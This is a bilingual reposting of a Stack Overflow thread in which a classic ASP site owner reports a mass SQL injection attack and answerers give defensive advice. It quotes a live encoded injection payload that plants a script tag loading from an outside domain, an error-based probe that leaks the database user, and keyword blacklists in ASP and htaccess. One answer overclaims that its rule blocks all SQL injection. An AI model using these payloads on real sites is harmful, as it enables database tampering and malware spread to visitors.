javascript 攻击使用 SQL 服务器数据库的 ASP 站点
声明:本页面是StackOverFlow热门问题的中英对照翻译,遵循CC BY-SA 4.0协议,如果您需要使用它,必须同样遵循CC BY-SA许可,注明原文地址和作者信息,同时你必须将它归于原作者(不是我):StackOverFlow
原文地址: http://stackoverflow.com/questions/3788080/
Warning: these are provided under cc-by-sa 4.0 license. You are free to use/share it, But you must attribute it to the original authors (not me):
StackOverFlow
Attack on ASP site that uses a SQL server database
提问by David
We have a survey site that was apparently attacked. The symptoms are identical to what was described on the following page on this site: XSS Attack on the ASP.NET Website.
我们有一个显然遭到攻击的调查站点。症状与本网站以下页面中描述的相同: ASP.NET 网站上的 XSS 攻击。
I found multiple entries in our IIS logs that included the malicious code:
我在 IIS 日志中发现了多个包含恶意代码的条目:
< / title> < script src = http : // google-stats49.info/ur.php >.
</title> < script src = http : // google-stats49.info/ur.php >.
Here is an example of the value of the cs-uri-query field for one of the IIS log entries.
以下是 IIS 日志条目之一的 cs-uri-query 字段值的示例。
surveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast(categoryName+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
SurveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast(categoryName+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar( 116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar( 116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar( 58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar( 115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar( 102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar( 60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)) ,cast(char(32)+as+varchar(8)))--
I don't understand how the above code works but apparently this is what is being sent in a query string to corrupt columns in our database tables. We have shut down our site for the time being. We can remove the scripts from the database but that doesn't prevent it from being corrupted again when we bring the site back online.
我不明白上面的代码是如何工作的,但显然这是在查询字符串中发送到我们数据库表中损坏的列的内容。我们暂时关闭了我们的网站。我们可以从数据库中删除脚本,但这并不能防止在我们将站点重新联机时再次损坏它。
Does anyone have any suggestions on how to prevent this from happening?
有没有人对如何防止这种情况发生有任何建议?
回答by Cfreak
That's a SQL injection.
那是SQL注入。
- Never trust user input. You're taking input and sending it directly to the database
- Never trust your user input!
- Check all input against a whitelist of allowed values.
- For text input make sure everything is escaped
- 永远不要相信用户输入。您正在接受输入并将其直接发送到数据库
- 永远不要相信您的用户输入!
- 根据允许值的白名单检查所有输入。
- 对于文本输入,确保所有内容都已转义
There is tons on this subject: Google is your friend
关于这个主题有很多:谷歌是你的朋友
回答by Nikki9696
Also...
还...
- Use parameterized queries.
- Get off old classic ASP, which makes it harder to use parameterized queries. Move to .NET, which has easier validation and can restrict values, disallow html input and so on.
- 使用参数化查询。
- 摆脱旧的经典 ASP,这使得使用参数化查询变得更加困难。转移到 .NET,它更容易验证并且可以限制值、禁止 html 输入等。
回答by rustySamurai
Not sure if this is still relevant for you, but I have had this happen in the past as we still run some old asp sites. There are two things you need to clean this up. First is a find and replace stored procedure for your database (easy enough to Google this), if you can get away with it. Unfortunately sometimes the data is cut off depending on the field type, but there is nothing to do here. Otherwise a roll back for your db is necessary.
不确定这是否仍然与您相关,但我过去曾发生过这种情况,因为我们仍在运行一些旧的 asp 站点。有两件事你需要清理它。首先是为您的数据库查找和替换存储过程(很容易在谷歌上搜索),如果你能逃脱的话。不幸的是,有时数据会根据字段类型被截断,但这里没有什么可做的。否则,需要回滚您的数据库。
Second is insert a SQL injection hack prevention script like this as an include beforeyour database connection:
其次是在您的数据库连接之前插入一个像这样的 SQL 注入黑客预防脚本作为包含:
Good luck.
祝你好运。
<%
' SqlCheckInclude.asp
'
' This is the include file to use with your asp pages to
' validate input for SQL injection.
Dim BlackList, ErrorPage, s
'
' Below is a black list that will block certain SQL commands and
' sequences used in SQL injection will help with input sanitization
'
' However this is may not suffice, because:
' 1) These might not cover all the cases (like encoded characters)
' 2) This may disallow legitimate input
'
' Creating a raw sql query strings by concatenating user input is
' unsafe programming practice. It is advised that you use parameterized
' SQL instead. Check http://support.microsoft.com/kb/q164485/ for information
' on how to do this using ADO from ASP.
'
' Moreover, you need to also implement a white list for your parameters.
' For example, if you are expecting input for a zipcode you should create
' a validation rule that will only allow 5 characters in [0-9].
'
BlackList = Array("--", ";", "/", "/", "@@", "@",_
"char", "nchar", "varchar", "nvarchar",_
"alter", "begin", "cast", "create", "cursor",_
"declare", "delete", "drop", "end", "exec",_
"execute", "fetch", "insert", "kill", "open",_
"select", "sys", "sysobjects", "syscolumns",_
"table", "update")
' Populate the error page you want to redirect to in case the
' check fails.
ErrorPage = "/ErrorPage.asp"
'''''''''''''''''''''''''''''''''''''''''''''''''''
' This function does not check for encoded characters
' since we do not know the form of encoding your application
' uses. Add the appropriate logic to deal with encoded characters
' in here
'''''''''''''''''''''''''''''''''''''''''''''''''''
Function CheckStringForSQL(str)
On Error Resume Next
Dim lstr
' If the string is empty, return true
If ( IsEmpty(str) ) Then
CheckStringForSQL = false
Exit Function
ElseIf ( StrComp(str, "") = 0 ) Then
CheckStringForSQL = false
Exit Function
End If
lstr = LCase(str)
' Check if the string contains any patterns in our
' black list
For Each s in BlackList
If ( InStr (lstr, s) <> 0 ) Then
CheckStringForSQL = true
Exit Function
End If
Next
CheckStringForSQL = false
End Function
'''''''''''''''''''''''''''''''''''''''''''''''''''
' Check forms data
'''''''''''''''''''''''''''''''''''''''''''''''''''
For Each s in Request.Form
If ( CheckStringForSQL(Request.Form(s)) ) Then
' Redirect to an error page
Response.Redirect(ErrorPage)
End If
Next
'''''''''''''''''''''''''''''''''''''''''''''''''''
' Check query string
'''''''''''''''''''''''''''''''''''''''''''''''''''
For Each s in Request.QueryString
If ( CheckStringForSQL(Request.QueryString(s)) ) Then
' Redirect to error page
Response.Redirect(ErrorPage)
End If
Next
'''''''''''''''''''''''''''''''''''''''''''''''''''
' Check cookies
'''''''''''''''''''''''''''''''''''''''''''''''''''
For Each s in Request.Cookies
If ( CheckStringForSQL(Request.Cookies(s)) ) Then
' Redirect to error page
Response.Redirect(ErrorPage)
End If
Next
'''''''''''''''''''''''''''''''''''''''''''''''''''
' Add additional checks for input that your application
' uses. (for example various request headers your app
' might use)
'''''''''''''''''''''''''''''''''''''''''''''''''''
%>
回答by Francesco Rapanà
Configure your IIS to send a custom error page or the default error 500 page instead of sending detailed error messages to the client.
将 IIS 配置为发送自定义错误页面或默认错误 500 页面,而不是向客户端发送详细的错误消息。
Detailed error messages has been used to find the db schema. Then they used sql injection to update text fields.
详细的错误消息已用于查找数据库架构。然后他们使用 sql 注入来更新文本字段。
Here's an example to get the DB user:
这是获取数据库用户的示例:
/page.asp?realparameter=1And%20char(94)%2Buser%2Bchar(94)=0
that is "and ^+user+^=0" and it returns:
那是“and ^+user+^=0”,它返回:
[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Conversion_failed_when_converting_nvarchar_value_'^myDbUsername^'_to_data_type_int.
[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Conversion_failed_when_converting_nvarchar_value_'^myDbUsername^'_to_data_type_int。
where "myDbUsername" is your real database user.
其中“myDbUsername”是您真正的数据库用户。
Using a similar tecnique it is possible to get databases, tables, columns, types etc. one by one.
使用类似的技术可以一一获取数据库、表、列、类型等。
If you have not been already attacked then disable detailed errors in IIS, otherwise check your logs to find which pages have sql injection vulnerabilities and correct them.
如果您还没有受到攻击,则禁用 IIS 中的详细错误,否则请检查您的日志以查找哪些页面存在 sql 注入漏洞并纠正它们。
I wrote a small script to check if there are "<script" in my database:
我写了一个小脚本来检查我的数据库中是否有“<script”:
DECLARE c1 cursor for SELECT 'SELECT COUNT(*), '''+QUOTENAME(TABLE_SCHEMA)+'.'+QUOTENAME(TABLE_NAME)+''', '''+QUOTENAME(COLUMN_NAME)+''''+
' FROM ' + quotename(TABLE_SCHEMA) + '.'+QUOTENAME(TABLE_NAME) +
' WHERE ' + QUOTENAME(COLUMN_NAME) + ' LIKE ''%<script%'''
FROM INFORMATION_SCHEMA.COLUMNS c
WHERE DATA_TYPE IN ('nvarchar', 'nchar', 'varchar', 'char', 'text', 'ntext')
and QUOTENAME(TABLE_NAME) not in (SELECT QUOTENAME(name)AS TABLE_NAME FROM sys.views)
order by QUOTENAME(TABLE_NAME);
DECLARE @CMD VARCHAR(200), @return varchar(10)
OPEN C1
FETCH NEXT FROM C1 INTO @CMD
WHILE @@FETCH_STATUS <> -1
BEGIN
declare @sql nvarchar(500), @tbl varchar(200), @col varchar(200)
set @sql = 'declare c2 cursor for ' + @CMD
exec sp_executesql @sql
open c2
FETCH NEXT FROM C2 INTO @return, @tbl, @col
WHILE @@FETCH_STATUS <> -1
BEGIN
if(@return > 0)
BEGIN
PRINT @return + ' records found in ' + @tbl + '.' + @col
exec('SELECT '+@col+' FROM '+@tbl+' WHERE '+@col+' LIKE ''%<script%''')
END
FETCH NEXT FROM C2 INTO @return, @tbl, @col
END
CLOSE C2
DEALLOCATE C2
FETCH NEXT FROM C1 INTO @CMD
END
CLOSE C1
DEALLOCATE C1
I'm on IIS 7, Win Server 2008 and SQL Server 2008 so it doesn't seems this attack uses any SQL Server 2003 / 2005 vulnerabilities as stated in many articles on the web.
我使用的是 IIS 7、Win Server 2008 和 SQL Server 2008,因此该攻击似乎没有使用网络上许多文章中所述的任何 SQL Server 2003 / 2005 漏洞。
回答by Thomas at GTISC
You are being hit by the LizaMoon automated SQL injection exploit pack, and are now mentioned in an artice on the page of the company that is credited with first documenting the attack: http://community.websense.com/blogs/securitylabs/archive/2011/03/31/update-on-lizamoon-mass-injection.aspx
您正在受到 LizaMoon 自动 SQL 注入漏洞利用包的攻击,现在在公司页面上的一篇文章中提到了该公司的第一个记录攻击的文档:http: //community.websense.com/blogs/securitylabs/archive /2011/03/31/update-on-lizamoon-mass-injection.aspx
回答by Ed-AITpro
The BulletProof Security WordPress plugin has the SQL Injection filters that will block this attack in an htaccess file. Since you have an IIS server you would need to add additional features that would enable you to use an htaccess file or maybe you could incorporate the SQL Injection filters in some other way with IIS since htaccess is traditionally an Apache thing. This is the line in the BulletProof Security master htaccess file that blocks ALL SQL Injection hacking attempts:
BulletProof Security WordPress 插件具有 SQL 注入过滤器,可以在 htaccess 文件中阻止这种攻击。因为你有一个 IIS 服务器,你需要添加额外的功能,使你能够使用 htaccess 文件,或者你可以以其他方式将 SQL 注入过滤器与 IIS 合并,因为 htaccess 传统上是 Apache 的东西。这是 BulletProof Security 主 htaccess 文件中阻止所有 SQL 注入黑客尝试的行:
RewriteCond %{QUERY_STRING} ^.*(execute|exec|sp_executesql|request|select|insert|union|declare|drop|delete|create|alter|update|order|char|set|cast|convert|meta|script|truncate).* [NC]
RewriteRule ^(.*)$ - [F,L]
